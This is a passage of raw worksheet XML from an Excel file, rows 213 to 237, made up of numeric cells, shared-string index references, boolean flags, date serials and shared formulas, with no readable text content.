        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S213" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="1">
        <v>2755.0</v>
      </c>
      <c r="B214" s="2" t="s">
        <v>1115</v>
      </c>
      <c r="C214" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D214" s="2" t="s">
        <v>1116</v>
      </c>
      <c r="E214" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F214" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G214" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H214" s="4">
        <v>44564.933333333334</v>
      </c>
      <c r="I214" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J214" s="1" t="s">
        <v>1117</v>
      </c>
      <c r="K214" s="2" t="s">
        <v>1113</v>
      </c>
      <c r="L214" s="1">
        <v>1.0</v>
      </c>
      <c r="M214" s="1">
        <v>1.0</v>
      </c>
      <c r="N214" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O214" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P214" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q214" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R214" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S214" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="1">
        <v>2756.0</v>
      </c>
      <c r="B215" s="2" t="s">
        <v>1115</v>
      </c>
      <c r="C215" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D215" s="2" t="s">
        <v>1116</v>
      </c>
      <c r="E215" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F215" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G215" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H215" s="4">
        <v>44564.93402777778</v>
      </c>
      <c r="I215" s="1" t="s">
        <v>1118</v>
      </c>
      <c r="J215" s="1" t="s">
        <v>1119</v>
      </c>
      <c r="K215" s="2" t="s">
        <v>1113</v>
      </c>
      <c r="L215" s="1">
        <v>1.0</v>
      </c>
      <c r="M215" s="1">
        <v>1.0</v>
      </c>
      <c r="N215" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O215" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P215" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q215" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R215" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S215" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="1">
        <v>2757.0</v>
      </c>
      <c r="B216" s="2" t="s">
        <v>1115</v>
      </c>
      <c r="C216" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D216" s="2" t="s">
        <v>1116</v>
      </c>
      <c r="E216" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F216" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G216" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H216" s="4">
        <v>44564.93402777778</v>
      </c>
      <c r="I216" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J216" s="1" t="s">
        <v>1120</v>
      </c>
      <c r="K216" s="2" t="s">
        <v>1113</v>
      </c>
      <c r="L216" s="1">
        <v>1.0</v>
      </c>
      <c r="M216" s="1">
        <v>1.0</v>
      </c>
      <c r="N216" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O216" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P216" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q216" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R216" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S216" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="1">
        <v>2758.0</v>
      </c>
      <c r="B217" s="2" t="s">
        <v>1121</v>
      </c>
      <c r="C217" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D217" s="2" t="s">
        <v>1122</v>
      </c>
      <c r="E217" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F217" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G217" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H217" s="4">
        <v>44595.03402777778</v>
      </c>
      <c r="I217" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J217" s="1" t="s">
        <v>1112</v>
      </c>
      <c r="K217" s="2" t="s">
        <v>1113</v>
      </c>
      <c r="L217" s="1">
        <v>5.0</v>
      </c>
      <c r="M217" s="1">
        <v>8.0</v>
      </c>
      <c r="N217" s="1" t="s">
        <v>1123</v>
      </c>
      <c r="O217" s="1" t="s">
        <v>1114</v>
      </c>
      <c r="P217" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q217" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R217" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S217" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="1">
        <v>2763.0</v>
      </c>
      <c r="B218" s="2" t="s">
        <v>1124</v>
      </c>
      <c r="C218" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D218" s="2" t="s">
        <v>1122</v>
      </c>
      <c r="E218" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F218" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G218" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H218" s="4">
        <v>44871.5875</v>
      </c>
      <c r="I218" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J218" s="1" t="s">
        <v>1112</v>
      </c>
      <c r="K218" s="2" t="s">
        <v>1113</v>
      </c>
      <c r="L218" s="1">
        <v>5.0</v>
      </c>
      <c r="M218" s="1">
        <v>8.0</v>
      </c>
      <c r="N218" s="1" t="s">
        <v>1125</v>
      </c>
      <c r="O218" s="1" t="s">
        <v>1114</v>
      </c>
      <c r="P218" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q218" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R218" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S218" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="1">
        <v>2765.0</v>
      </c>
      <c r="B219" s="2" t="s">
        <v>1126</v>
      </c>
      <c r="C219" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D219" s="2" t="s">
        <v>1127</v>
      </c>
      <c r="E219" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F219" s="1" t="s">
        <v>586</v>
      </c>
      <c r="G219" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H219" s="1" t="s">
        <v>1128</v>
      </c>
      <c r="I219" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J219" s="1" t="s">
        <v>1129</v>
      </c>
      <c r="K219" s="2" t="s">
        <v>1130</v>
      </c>
      <c r="L219" s="1">
        <v>5.0</v>
      </c>
      <c r="M219" s="1">
        <v>6.0</v>
      </c>
      <c r="N219" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O219" s="1" t="s">
        <v>1131</v>
      </c>
      <c r="P219" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q219" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R219" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S219" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="1">
        <v>2766.0</v>
      </c>
      <c r="B220" s="2" t="s">
        <v>1132</v>
      </c>
      <c r="C220" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D220" s="2" t="s">
        <v>1133</v>
      </c>
      <c r="E220" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F220" s="1" t="s">
        <v>1134</v>
      </c>
      <c r="G220" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H220" s="1" t="s">
        <v>1135</v>
      </c>
      <c r="I220" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J220" s="1" t="s">
        <v>1129</v>
      </c>
      <c r="K220" s="2" t="s">
        <v>1130</v>
      </c>
      <c r="L220" s="1">
        <v>5.0</v>
      </c>
      <c r="M220" s="1">
        <v>6.0</v>
      </c>
      <c r="N220" s="1" t="s">
        <v>1136</v>
      </c>
      <c r="O220" s="1" t="s">
        <v>1131</v>
      </c>
      <c r="P220" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q220" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R220" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S220" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="1">
        <v>2767.0</v>
      </c>
      <c r="B221" s="2" t="s">
        <v>1137</v>
      </c>
      <c r="C221" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D221" s="2" t="s">
        <v>1133</v>
      </c>
      <c r="E221" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F221" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G221" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H221" s="1" t="s">
        <v>1138</v>
      </c>
      <c r="I221" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J221" s="1" t="s">
        <v>1129</v>
      </c>
      <c r="K221" s="2" t="s">
        <v>1130</v>
      </c>
      <c r="L221" s="1">
        <v>5.0</v>
      </c>
      <c r="M221" s="1">
        <v>6.0</v>
      </c>
      <c r="N221" s="1" t="s">
        <v>1139</v>
      </c>
      <c r="O221" s="1" t="s">
        <v>1131</v>
      </c>
      <c r="P221" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q221" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R221" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S221" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="1">
        <v>2782.0</v>
      </c>
      <c r="B222" s="2" t="s">
        <v>1140</v>
      </c>
      <c r="C222" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D222" s="2" t="s">
        <v>1141</v>
      </c>
      <c r="E222" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F222" s="1" t="s">
        <v>741</v>
      </c>
      <c r="G222" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H222" s="1" t="s">
        <v>1142</v>
      </c>
      <c r="I222" s="1" t="s">
        <v>742</v>
      </c>
      <c r="J222" s="1" t="s">
        <v>1143</v>
      </c>
      <c r="K222" s="2" t="s">
        <v>1144</v>
      </c>
      <c r="L222" s="1">
        <v>1.0</v>
      </c>
      <c r="M222" s="1">
        <v>1.0</v>
      </c>
      <c r="N222" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O222" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P222" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q222" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R222" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S222" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="1">
        <v>2783.0</v>
      </c>
      <c r="B223" s="2" t="s">
        <v>1145</v>
      </c>
      <c r="C223" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D223" s="2" t="s">
        <v>1146</v>
      </c>
      <c r="E223" s="2" t="s">
        <v>60</v>
      </c>
      <c r="F223" s="1" t="s">
        <v>1147</v>
      </c>
      <c r="G223" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H223" s="1" t="s">
        <v>1148</v>
      </c>
      <c r="I223" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J223" s="1" t="s">
        <v>1149</v>
      </c>
      <c r="K223" s="2" t="s">
        <v>1150</v>
      </c>
      <c r="L223" s="1">
        <v>4.0</v>
      </c>
      <c r="M223" s="1">
        <v>5.0</v>
      </c>
      <c r="N223" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O223" s="1" t="s">
        <v>1151</v>
      </c>
      <c r="P223" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q223" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R223" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S223" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="1">
        <v>2784.0</v>
      </c>
      <c r="B224" s="2" t="s">
        <v>1152</v>
      </c>
      <c r="C224" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D224" s="2" t="s">
        <v>1153</v>
      </c>
      <c r="E224" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F224" s="1" t="s">
        <v>1154</v>
      </c>
      <c r="G224" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H224" s="1" t="s">
        <v>1155</v>
      </c>
      <c r="I224" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J224" s="1" t="s">
        <v>1149</v>
      </c>
      <c r="K224" s="2" t="s">
        <v>1150</v>
      </c>
      <c r="L224" s="1">
        <v>4.0</v>
      </c>
      <c r="M224" s="1">
        <v>5.0</v>
      </c>
      <c r="N224" s="1" t="s">
        <v>1156</v>
      </c>
      <c r="O224" s="1" t="s">
        <v>1151</v>
      </c>
      <c r="P224" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q224" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R224" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S224" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="1">
        <v>2785.0</v>
      </c>
      <c r="B225" s="2" t="s">
        <v>1157</v>
      </c>
      <c r="C225" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D225" s="2" t="s">
        <v>1153</v>
      </c>
      <c r="E225" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F225" s="1" t="s">
        <v>1147</v>
      </c>
      <c r="G225" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H225" s="1" t="s">
        <v>1158</v>
      </c>
      <c r="I225" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J225" s="1" t="s">
        <v>1149</v>
      </c>
      <c r="K225" s="2" t="s">
        <v>1150</v>
      </c>
      <c r="L225" s="1">
        <v>4.0</v>
      </c>
      <c r="M225" s="1">
        <v>5.0</v>
      </c>
      <c r="N225" s="1" t="s">
        <v>1159</v>
      </c>
      <c r="O225" s="1" t="s">
        <v>1151</v>
      </c>
      <c r="P225" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q225" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R225" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S225" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="1">
        <v>2787.0</v>
      </c>
      <c r="B226" s="2" t="s">
        <v>1160</v>
      </c>
      <c r="C226" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D226" s="2" t="s">
        <v>1161</v>
      </c>
      <c r="E226" s="2" t="s">
        <v>124</v>
      </c>
      <c r="F226" s="1" t="s">
        <v>1147</v>
      </c>
      <c r="G226" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H226" s="4">
        <v>43504.13611111111</v>
      </c>
      <c r="I226" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J226" s="1" t="s">
        <v>1162</v>
      </c>
      <c r="K226" s="2" t="s">
        <v>1150</v>
      </c>
      <c r="L226" s="1">
        <v>1.0</v>
      </c>
      <c r="M226" s="1">
        <v>1.0</v>
      </c>
      <c r="N226" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O226" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P226" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q226" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R226" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S226" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="1">
        <v>2789.0</v>
      </c>
      <c r="B227" s="2" t="s">
        <v>1163</v>
      </c>
      <c r="C227" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D227" s="2" t="s">
        <v>1164</v>
      </c>
      <c r="E227" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F227" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G227" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H227" s="1" t="s">
        <v>1165</v>
      </c>
      <c r="I227" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J227" s="1" t="s">
        <v>1166</v>
      </c>
      <c r="K227" s="2" t="s">
        <v>1167</v>
      </c>
      <c r="L227" s="1">
        <v>1.0</v>
      </c>
      <c r="M227" s="1">
        <v>1.0</v>
      </c>
      <c r="N227" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O227" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P227" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q227" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R227" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S227" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="1">
        <v>2795.0</v>
      </c>
      <c r="B228" s="2" t="s">
        <v>1168</v>
      </c>
      <c r="C228" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D228" s="2" t="s">
        <v>1169</v>
      </c>
      <c r="E228" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F228" s="1" t="s">
        <v>1170</v>
      </c>
      <c r="G228" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H228" s="1" t="s">
        <v>1171</v>
      </c>
      <c r="I228" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J228" s="1" t="s">
        <v>1172</v>
      </c>
      <c r="K228" s="2" t="s">
        <v>1173</v>
      </c>
      <c r="L228" s="1">
        <v>2.0</v>
      </c>
      <c r="M228" s="1">
        <v>2.0</v>
      </c>
      <c r="N228" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O228" s="1" t="s">
        <v>1174</v>
      </c>
      <c r="P228" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q228" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R228" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S228" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="1">
        <v>2796.0</v>
      </c>
      <c r="B229" s="2" t="s">
        <v>1175</v>
      </c>
      <c r="C229" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D229" s="2" t="s">
        <v>1176</v>
      </c>
      <c r="E229" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F229" s="1" t="s">
        <v>1177</v>
      </c>
      <c r="G229" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H229" s="1" t="s">
        <v>1178</v>
      </c>
      <c r="I229" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J229" s="1" t="s">
        <v>1172</v>
      </c>
      <c r="K229" s="2" t="s">
        <v>1173</v>
      </c>
      <c r="L229" s="1">
        <v>2.0</v>
      </c>
      <c r="M229" s="1">
        <v>2.0</v>
      </c>
      <c r="N229" s="1" t="s">
        <v>1174</v>
      </c>
      <c r="O229" s="1" t="s">
        <v>1174</v>
      </c>
      <c r="P229" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q229" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R229" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S229" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="1">
        <v>2797.0</v>
      </c>
      <c r="B230" s="2" t="s">
        <v>1179</v>
      </c>
      <c r="C230" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D230" s="2" t="s">
        <v>1180</v>
      </c>
      <c r="E230" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F230" s="1" t="s">
        <v>1181</v>
      </c>
      <c r="G230" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H230" s="1" t="s">
        <v>1182</v>
      </c>
      <c r="I230" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J230" s="1" t="s">
        <v>1183</v>
      </c>
      <c r="K230" s="2" t="s">
        <v>1184</v>
      </c>
      <c r="L230" s="1">
        <v>1.0</v>
      </c>
      <c r="M230" s="1">
        <v>1.0</v>
      </c>
      <c r="N230" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O230" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P230" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q230" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R230" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S230" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="1">
        <v>2798.0</v>
      </c>
      <c r="B231" s="2" t="s">
        <v>1185</v>
      </c>
      <c r="C231" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D231" s="2" t="s">
        <v>1186</v>
      </c>
      <c r="E231" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F231" s="1" t="s">
        <v>1187</v>
      </c>
      <c r="G231" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H231" s="1" t="s">
        <v>1188</v>
      </c>
      <c r="I231" s="1" t="s">
        <v>1189</v>
      </c>
      <c r="J231" s="1" t="s">
        <v>1190</v>
      </c>
      <c r="K231" s="2" t="s">
        <v>1191</v>
      </c>
      <c r="L231" s="1">
        <v>2.0</v>
      </c>
      <c r="M231" s="1">
        <v>3.0</v>
      </c>
      <c r="N231" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O231" s="1" t="s">
        <v>1192</v>
      </c>
      <c r="P231" s="1" t="s">
        <v>1063</v>
      </c>
      <c r="Q231" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R231" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S231" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="1">
        <v>2817.0</v>
      </c>
      <c r="B232" s="2" t="s">
        <v>1193</v>
      </c>
      <c r="C232" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D232" s="2" t="s">
        <v>1194</v>
      </c>
      <c r="E232" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F232" s="1" t="s">
        <v>1195</v>
      </c>
      <c r="G232" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H232" s="1" t="s">
        <v>1196</v>
      </c>
      <c r="I232" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J232" s="1" t="s">
        <v>1197</v>
      </c>
      <c r="K232" s="2" t="s">
        <v>1198</v>
      </c>
      <c r="L232" s="1">
        <v>4.0</v>
      </c>
      <c r="M232" s="1">
        <v>8.0</v>
      </c>
      <c r="N232" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O232" s="1" t="s">
        <v>1199</v>
      </c>
      <c r="P232" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q232" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R232" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S232" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="1">
        <v>2818.0</v>
      </c>
      <c r="B233" s="2" t="s">
        <v>1200</v>
      </c>
      <c r="C233" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D233" s="2" t="s">
        <v>1201</v>
      </c>
      <c r="E233" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F233" s="1" t="s">
        <v>791</v>
      </c>
      <c r="G233" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H233" s="1" t="s">
        <v>1202</v>
      </c>
      <c r="I233" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J233" s="1" t="s">
        <v>1197</v>
      </c>
      <c r="K233" s="2" t="s">
        <v>1198</v>
      </c>
      <c r="L233" s="1">
        <v>4.0</v>
      </c>
      <c r="M233" s="1">
        <v>8.0</v>
      </c>
      <c r="N233" s="1" t="s">
        <v>1203</v>
      </c>
      <c r="O233" s="1" t="s">
        <v>1199</v>
      </c>
      <c r="P233" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q233" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R233" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S233" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="1">
        <v>2821.0</v>
      </c>
      <c r="B234" s="2" t="s">
        <v>1204</v>
      </c>
      <c r="C234" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D234" s="2" t="s">
        <v>1201</v>
      </c>
      <c r="E234" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F234" s="1" t="s">
        <v>1205</v>
      </c>
      <c r="G234" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H234" s="4">
        <v>44567.90694444445</v>
      </c>
      <c r="I234" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J234" s="1" t="s">
        <v>1197</v>
      </c>
      <c r="K234" s="2" t="s">
        <v>1198</v>
      </c>
      <c r="L234" s="1">
        <v>4.0</v>
      </c>
      <c r="M234" s="1">
        <v>8.0</v>
      </c>
      <c r="N234" s="1" t="s">
        <v>1206</v>
      </c>
      <c r="O234" s="1" t="s">
        <v>1199</v>
      </c>
      <c r="P234" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q234" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R234" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S234" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="1">
        <v>2822.0</v>
      </c>
      <c r="B235" s="2" t="s">
        <v>1207</v>
      </c>
      <c r="C235" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D235" s="2" t="s">
        <v>1201</v>
      </c>
      <c r="E235" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F235" s="1" t="s">
        <v>1208</v>
      </c>
      <c r="G235" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H235" s="4">
        <v>44901.20694444444</v>
      </c>
      <c r="I235" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J235" s="1" t="s">
        <v>1197</v>
      </c>
      <c r="K235" s="2" t="s">
        <v>1198</v>
      </c>
      <c r="L235" s="1">
        <v>4.0</v>
      </c>
      <c r="M235" s="1">
        <v>8.0</v>
      </c>
      <c r="N235" s="1" t="s">
        <v>1209</v>
      </c>
      <c r="O235" s="1" t="s">
        <v>1199</v>
      </c>
      <c r="P235" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q235" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R235" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S235" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="1">
        <v>2823.0</v>
      </c>
      <c r="B236" s="2" t="s">
        <v>1210</v>
      </c>
      <c r="C236" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D236" s="6" t="s">
        <v>1194</v>
      </c>
      <c r="E236" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F236" s="1" t="s">
        <v>1195</v>
      </c>
      <c r="G236" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H236" s="1" t="s">
        <v>1211</v>
      </c>
      <c r="I236" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J236" s="1" t="s">
        <v>1197</v>
      </c>
      <c r="K236" s="2" t="s">
        <v>1198</v>
      </c>
      <c r="L236" s="1">
        <v>4.0</v>
      </c>
      <c r="M236" s="1">
        <v>8.0</v>
      </c>
      <c r="N236" s="1" t="s">
        <v>1212</v>
      </c>
      <c r="O236" s="1" t="s">
        <v>1199</v>
      </c>
      <c r="P236" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q236" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R236" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S236" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="1">
        <v>2824.0</v>
      </c>
      <c r="B237" s="2" t="s">
        <v>1213</v>
      </c>
      <c r="C237" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D237" s="2" t="s">
        <v>1201</v>
      </c>
      <c r="E237" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F237" s="1" t="s">
        <v>1205</v>
      </c>
      <c r="G237" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H237" s="4">
